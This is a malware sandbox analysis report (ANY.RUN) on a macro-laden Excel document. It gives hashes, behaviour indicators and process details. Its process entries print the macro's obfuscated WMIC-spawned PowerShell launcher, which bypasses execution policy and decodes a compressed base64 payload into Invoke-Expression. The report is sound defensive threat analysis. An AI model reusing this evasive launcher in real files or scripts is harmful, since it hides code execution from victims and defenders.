General Info

File name

doc483 del 04 Giugno _Srl.xls

Full analysis
https://app.any.run/tasks/f80860af-4baf-49c6-96b2-68b0e94f5256
Verdict
Malicious activity
Analysis date
6/12/2019, 09:57:41
OS:
Windows 7 Professional Service Pack 1 (build: 7601, 32 bit)
Tags:

macros

macros-on-open

Indicators:

MIME:
application/vnd.ms-excel
File info:
Composite Document File V2 Document, Little Endian, Os: Windows, Version 10.0, Code page: 1252, Author: autore, Last Saved By: UTEnte, Name of Creating Application: Microsoft Excel, Create Time/Date: Mon Jun 3 08:30:17 2019, Last Saved Time/Date: Tue Jun 4 07:23:56 2019, Security: 0
MD5

f8a360a6a4a8cb011c2ab2c4b7170108

SHA1

1cd82fbe69ea85e6fc26fca85bc80f038b29fd7a

SHA256

de96e1df1700e5f375ca645d67e01aabd2476b83cb1728750f0bd6a7e2e4d599

SSDEEP

3072:lj9n1DN3aM+UKc1/pnVv+00UcUW+gJDlYkEIuPm3fNRZmbaoFhZhR0cixIHm0qnm:Dn1DN3aM+UKc1/pnVv+00UcUW+gJDlYB

ANY.RUN is an interactive service which provides full access to the guest system. Information in this report could be distorted by user actions and is provided for user acknowledgement as it is. ANY.RUN does not guarantee maliciousness or safety of the content.

Software environment set and analysis options

Launch configuration

Task duration
180 seconds
Additional time used
120 seconds
Fakenet option
off
Heavy Evasion option
off
MITM proxy
off
Route via Tor
off
Network geolocation
off
Privacy
Public submission
Autoconfirmation of UAC
on

Software preset

  • Internet Explorer 8.0.7601.17514
  • Adobe Acrobat Reader DC MUI (15.023.20070)
  • Adobe Flash Player 26 ActiveX (26.0.0.131)
  • Adobe Flash Player 26 NPAPI (26.0.0.131)
  • Adobe Flash Player 26 PPAPI (26.0.0.131)
  • Adobe Refresh Manager (1.8.0)
  • CCleaner (5.35)
  • FileZilla Client 3.36.0 (3.36.0)
  • Google Chrome (73.0.3683.75)
  • Google Update Helper (1.3.33.23)
  • Java 8 Update 92 (8.0.920.14)
  • Java Auto Updater (2.8.92.14)
  • Microsoft .NET Framework 4.6.1 (4.6.01055)
  • Microsoft Office Access MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Access Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Excel MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office OneNote MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Outlook MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office PowerPoint MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Professional 2010 (14.0.6029.1000)
  • Microsoft Office Proof (English) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (French) 2010 (14.0.6029.1000)
  • Microsoft Office Proof (Spanish) 2010 (14.0.6029.1000)
  • Microsoft Office Proofing (English) 2010 (14.0.6029.1000)
  • Microsoft Office Publisher MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Shared Setup Metadata MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Office Single Image 2010 (14.0.6029.1000)
  • Microsoft Office Word MUI (English) 2010 (14.0.6029.1000)
  • Microsoft Visual C++ 2008 Redistributable - x86 9.0.30729.6161 (9.0.30729.6161)
  • Microsoft Visual C++ 2010 x86 Redistributable - 10.0.40219 (10.0.40219)
  • Microsoft Visual C++ 2013 Redistributable (x86) - 12.0.30501 (12.0.30501.0)
  • Microsoft Visual C++ 2013 x86 Additional Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2013 x86 Minimum Runtime - 12.0.21005 (12.0.21005)
  • Microsoft Visual C++ 2017 Redistributable (x86) - 14.15.26706 (14.15.26706.0)
  • Microsoft Visual C++ 2017 x86 Additional Runtime - 14.15.26706 (14.15.26706)
  • Microsoft Visual C++ 2017 x86 Minimum Runtime - 14.15.26706 (14.15.26706)
  • Mozilla Firefox 65.0.2 (x86 en-US) (65.0.2)
  • Notepad++ (32-bit x86) (7.5.1)
  • Opera 12.15 (12.15.1748)
  • Skype version 8.29 (8.29)
  • VLC media player (2.2.6)
  • WinRAR 5.60 (32-bit) (5.60.0)

Hotfixes

  • Client LanguagePack Package
  • Client Refresh LanguagePack Package
  • CodecPack Basic Package
  • Foundation Package
  • IE Troubleshooters Package
  • InternetExplorer Optional Package
  • KB2534111
  • KB2999226
  • KB976902
  • LocalPack AU Package
  • LocalPack CA Package
  • LocalPack GB Package
  • LocalPack US Package
  • LocalPack ZA Package
  • ProfessionalEdition
  • UltimateEdition

Behavior activities

Starts Visual C# compiler
  • POWershelL.exe (PID: 2752)
Unusual execution from Microsoft Office
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)
Uses WMIC.EXE to create a new process
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)
PowerShell script executed
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Creates files in the user directory
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Executed via WMI
  • POWershelL.exe (PID: 2752)
  • POWershelL.exe (PID: 1432)
Uses RUNDLL32.EXE to load library
  • rundll32.exe (PID: 764)
Application launched itself
  • rundll32.exe (PID: 764)
Manual execution by user
  • verclsid.exe (PID: 728)
  • EXCEL.EXE (PID: 1916)
  • rundll32.exe (PID: 764)
Reads Microsoft Office registry keys
  • EXCEL.EXE (PID: 1916)
  • EXCEL.EXE (PID: 3360)


Static information

TRiD
.xls
Microsoft Excel sheet (78.9%)
EXIF
FlashPix
Author:
autore
LastModifiedBy:
UTEnte
Software:
Microsoft Excel
CreateDate:
2019:06:03 07:30:17
ModifyDate:
2019:06:04 06:23:56
Security:
None
CodePage:
Windows Latin 1 (Western European)
Company:
null
AppVersion:
16
ScaleCrop:
No
LinksUpToDate:
No
SharedDoc:
No
HyperlinksChanged:
No
TitleOfParts
null
null
HeadingPairs
null
null
null
null
CompObjUserTypeLen:
42
CompObjUserType:
(Foglio di lavoro di Microsoft Excel 2003

Processes

Total processes
50
Monitored processes
12
Malicious processes
2
Suspicious processes
2

Behavior graph

Processes shown in the graph (none carry special specs): start, excel.exe, wmic.exe, powershell.exe, rundll32.exe, rundll32.exe, mctadmin.exe, verclsid.exe, excel.exe, wmic.exe, powershell.exe, csc.exe, cvtres.exe

Process information

PID
3360
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\mpr.dll
c:\program files\microsoft office\office14\gkexcel.dll
c:\windows\system32\windowscodecs.dll
c:\windows\system32\msxml6.dll
c:\progra~1\common~1\micros~1\vba\vba7\vbe7.dll
c:\windows\system32\sxs.dll
c:\progra~1\common~1\micros~1\vba\vba7\1033\vbe7intl.dll
c:\windows\system32\winspool.drv
c:\windows\system32\spool\drivers\w32x86\3\unidrvui.dll
c:\windows\system32\spool\drivers\w32x86\3\sendtoonenoteui.dll
c:\windows\system32\spool\drivers\w32x86\3\mxdwdrv.dll
c:\windows\system32\fontsub.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\wbem\wmic.exe
c:\windows\system32\winmm.dll
c:\windows\system32\oleacc.dll
c:\program files\common files\system\ado\msadox.dll

PID
3716
CMD
wMIc PROcEsS 'Call' CrEaTe "POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')"
Path
C:\Windows\System32\Wbem\wMIc.exe
Indicators
No indicators
Parent process
EXCEL.EXE
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
WMI Commandline Utility
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\wbem\wmic.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\sechost.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\framedynos.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\nsi.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\secur32.dll
c:\windows\system32\iphlpapi.dll
c:\windows\system32\winnsi.dll
c:\windows\system32\msctf.dll
c:\windows\system32\imm32.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\wbem\wbemprox.dll
c:\windows\system32\wbemcomn.dll
c:\windows\system32\msxml3.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\dnsapi.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\program files\common files\microsoft shared\office14\msoxmlmf.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\windows\system32\wbem\wbemsvc.dll
c:\windows\system32\wbem\fastprox.dll
c:\windows\system32\ntdsapi.dll

PID
1432
CMD
POWershelL -w 1 -eXeCutIonpoLIC bYpAss -NOninTeRA -NopRoFi -cOmmA sV P1LJ ( [StRing][ChAr]44 ) ; "\".("\" +[StrInG][CHAR]34 +"\"{1}{0}"\" +[StrInG][CHAR]34 +"\"-f'l'${P1LJ}'sa') l sal;.('l') t NEw-Object;&('l') k IeX;.('k')(&('t') Io.COmPRESSion.deFLATeSTreaM( [SyStEm.io.mEmOrYSTrEam] [cOnVErT]::FRoMBASe64sTrING(("\" +[StrInG][CHAR]34 +"\"{123}{20}{33}{17}{35}{103}{144}{89}{120}{124}{30}{116}{53}{4}{76}{25}{8}{84}{64}{71}{61}{107}{113}{95}{10}{57}{72}{93}{34}{125}{13}{127}{44}{49}{63}{28}{36}{12}{126}{98}{94}{115}{100}{88}{22}{39}{101}{131}{51}{32}{38}{77}{66}{37}{75}{56}{47}{112}{73}{130}{128}{52}{79}{5}{7}{15}{85}{132}{150}{121}{26}{147}{140}{43}{151}{109}{90}{118}{3}{70}{141}{91}{16}{41}{143}{45}{110}{74}{40}{31}{27}{78}{11}{59}{14}{119}{9}{21}{102}{117}{48}{60}{69}{97}{55}{29}{24}{142}{50}{114}{87}{139}{138}{67}{96}{148}{133}{149}{68}{42}{122}{2}{6}{137}{92}{19}{86}{23}{134}{108}{99}{145}{111}{104}{136}{129}{80}{58}{54}{46}{1}{81}{135}{105}{0}{18}{83}{146}{62}{82}{65}{106}"\" +[StrInG][CHO.cOMPReSSion.coMPrESSioNMODe]::deCOmpReSs ) |.('%'){ &('t') Io.StReamREaDer( `$_${P1LJ} [TexT.eNCODINg]::AScii)}|&('%'){ `$_.READtoeND( )} )"\" | . ( $PShOme[4]+$PshOME[30]+'X')
Path
C:\Windows\System32\WindowsPowerShell\v1.0\POWershelL.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows PowerShell
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\windowspowershell\v1.0\powershell.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\atl.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\mscoree.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\shell32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\shdocvw.dll
c:\windows\system32\linkinfo.dll
c:\windows\system32\ntshrui.dll
c:\windows\system32\srvcli.dll
c:\windows\system32\cscapi.dll
c:\windows\system32\slc.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\system32\version.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\windows\winsxs\x86_microsoft.vc80.crt_1fc8b3b9a1e18e3b_8.0.50727.4940_none_d08cc06a442b34fc\msvcr80.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\mscorlib\62a0b3e4b40ec0e8c5cfaa0c8848e64a\mscorlib.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system\9e0a3b9b9f457233a335d7fba8f95419\system.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\4bdde288f147e3b3f2c090ecdf704e6d\microsoft.powershell.consolehost.ni.dll
c:\windows\assembly\gac_msil\system.management.automation\1.0.0.0__31bf3856ad364e35\system.management.automation.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management.a#\a8e3a41ecbcc4bb1598ed5719f965110\system.management.automation.ni.dll
c:\windows\system32\psapi.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.core\fbc05b5b05dc6366b02b8e2f77d080f1\system.core.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\e112e4460a0c9122de8c382126da4a2f\microsoft.powershell.commands.diagnostics.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.configuratio#\f02737c83305687a68c088927a6c5a98\system.configuration.install.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.wsman.man#\f1865caa683ceb3d12b383a94a35da14\microsoft.wsman.management.ni.dll
c:\windows\assembly\gac_msil\microsoft.wsman.runtime\1.0.0.0__31bf3856ad364e35\microsoft.wsman.runtime.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.transactions\ad18f93fc713db2c4b29b25116c13bd8\system.transactions.ni.dll
c:\windows\assembly\gac_32\system.transactions\2.0.0.0__b77a5c561934e089\system.transactions.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\82d7758f278f47dc4191abab1cb11ce3\microsoft.powershell.commands.utility.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\583c7b9f52114c026088bdb9f19f64e8\microsoft.powershell.commands.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\microsoft.powershel#\6c5bef3ab74c06a641444eff648c0dde\microsoft.powershell.security.ni.dll
c:\windows\microsoft.net\framework\v2.0.50727\culture.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.xml\461d3b6b3f43e6fbe6c897d5936e17e4\system.xml.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.management\6f3b99ed0b791ff4d8aa52f2f0cd0bcf\system.management.ni.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.directoryser#\45ec12795950a7d54691591c615a9e3c\system.directoryservices.ni.dll
c:\windows\system32\shfolder.dll
c:\windows\system32\secur32.dll
c:\windows\system32\sspicli.dll
c:\windows\assembly\nativeimages_v2.0.50727_32\system.data\1e85062785e286cd9eae9c26d2c61f73\system.data.ni.dll
c:\windows\assembly\gac_32\system.data\2.0.0.0__b77a5c561934e089\system.data.dll
c:\windows\system32\ws2_32.dll
c:\windows\system32\nsi.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\msasn1.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorjit.dll
c:\windows\microsoft.net\framework\v2.0.50727\diasymreader.dll
c:\windows\system32\netutils.dll

PID
764
CMD
"C:\Windows\System32\rundll32.exe" C:\Windows\System32\shell32.dll,Control_RunDLL C:\Windows\System32\intl.cpl
Path
C:\Windows\System32\rundll32.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\intl.cpl
c:\windows\system32\atl.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\sechost.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\input.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\program files\common files\microsoft shared\ink\tiptsf.dll
c:\windows\ime\sptip.dll
c:\program files\windows nt\tabletextservice\tabletextservice.dll
c:\windows\system32\kbdit.dll
c:\windows\system32\kbdus.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
c:\windows\system32\iertutil.dll
c:\windows\system32\msasn1.dll
c:\windows\system32\crypt32.dll
c:\windows\system32\sfc.dll
c:\windows\system32\sfc_os.dll

PID
3920
CMD
"C:\Windows\system32\rundll32.exe" shell32.dll,Control_RunDLL input.dll
Path
C:\Windows\system32\rundll32.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Windows host process (Rundll32)
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\rundll32.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\imagehlp.dll
c:\windows\system32\apphelp.dll
c:\windows\apppatch\aclayers.dll
c:\windows\system32\sspicli.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\userenv.dll
c:\windows\system32\profapi.dll
c:\windows\system32\winspool.drv
c:\windows\system32\mpr.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\input.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\kbdus.dll

PID
2364
CMD
C:\Windows\system32\mctadmin.exe
Path
C:\Windows\system32\mctadmin.exe
Indicators
No indicators
Parent process
rundll32.exe
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
MCTAdmin
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\mctadmin.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\user32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll

PID
728
CMD
"C:\Windows\system32\verclsid.exe" /S /C {0B2C9183-C9FA-4C53-AE21-C900B0C39965} /I {0C733A8A-2A1C-11CE-ADE5-00AA0044773D} /X 0x401
Path
C:\Windows\system32\verclsid.exe
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Exit code
0
Version:
Company
Microsoft Corporation
Description
Extension CLSID Verification Host
Version
6.1.7600.16385 (win7_rtm.090713-1255)
Modules
Image
c:\windows\system32\verclsid.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\ole32.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\sechost.dll
c:\windows\system32\oleaut32.dll
c:\windows\system32\searchfolder.dll
c:\windows\system32\shell32.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll

PID
1916
CMD
"C:\Program Files\Microsoft Office\Office14\EXCEL.EXE" /dde
Path
C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
Indicators
No indicators
Parent process
––
User
admin
Integrity Level
MEDIUM
Version:
Company
Microsoft Corporation
Description
Microsoft Excel
Version
14.0.6024.1000
Modules
Image
c:\program files\microsoft office\office14\excel.exe
c:\systemroot\system32\ntdll.dll
c:\windows\system32\kernel32.dll
c:\windows\system32\kernelbase.dll
c:\windows\system32\advapi32.dll
c:\windows\system32\msvcrt.dll
c:\windows\system32\sechost.dll
c:\windows\system32\rpcrt4.dll
c:\windows\system32\gdi32.dll
c:\windows\system32\user32.dll
c:\windows\system32\lpk.dll
c:\windows\system32\usp10.dll
c:\windows\system32\ole32.dll
c:\windows\system32\oleaut32.dll
c:\windows\winsxs\x86_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.6161_none_50934f2ebcb7eb57\msvcr90.dll
c:\program files\microsoft office\office14\gfx.dll
c:\windows\system32\wtsapi32.dll
c:\windows\system32\msimg32.dll
c:\program files\microsoft office\office14\oart.dll
c:\windows\system32\apphelp.dll
c:\windows\system32\imm32.dll
c:\windows\system32\msctf.dll
c:\program files\common files\microsoft shared\office14\mso.dll
c:\windows\system32\msi.dll
c:\windows\system32\shlwapi.dll
c:\windows\winsxs\x86_microsoft.windows.common-controls_6595b64144ccf1df_6.0.7601.17514_none_41e6975e2bd6f2b2\comctl32.dll
c:\program files\common files\microsoft shared\office14\cultures\office.odf
c:\program files\common files\microsoft shared\office14\1033\msointl.dll
c:\program files\common files\microsoft shared\office14\msores.dll
c:\windows\system32\cryptbase.dll
c:\windows\system32\dwmapi.dll
c:\windows\system32\clbcatq.dll
c:\windows\system32\msimtf.dll
c:\windows\system32\version.dll
c:\program files\common files\microsoft shared\office14\riched20.dll
c:\windows\winsxs\x86_microsoft.windows.gdiplus_6595b64144ccf1df_1.1.7601.17514_none_72d18a4386696c80\gdiplus.dll
c:\windows\system32\mscoree.dll
c:\windows\microsoft.net\framework\v4.0.30319\mscoreei.dll
c:\windows\microsoft.net\framework\v2.0.50727\mscorwks.dll
c:\program files\common files\microsoft shared\officesoftwareprotectionplatform\osppc.dll
c:\windows\system32\uxtheme.dll
c:\windows\system32\powrprof.dll
c:\windows\system32\setupapi.dll
c:\windows\system32\cfgmgr32.dll
c:\windows\system32\devobj.dll
c:\windows\system32\cryptsp.dll
c:\windows\system32\rsaenh.dll
c:\windows\system32\rpcrtremote.dll
c:\windows\system32\winsta.dll
c:\windows\system32\shell32.dll
c:\windows\system32\propsys.dll
c:\windows\system32\ntmarta.dll
c:\windows\system32\wldap32.dll
c:\windows\system32\profapi.dll
c:\windows\system32\urlmon.dll
c:\windows\system32\wininet.dll
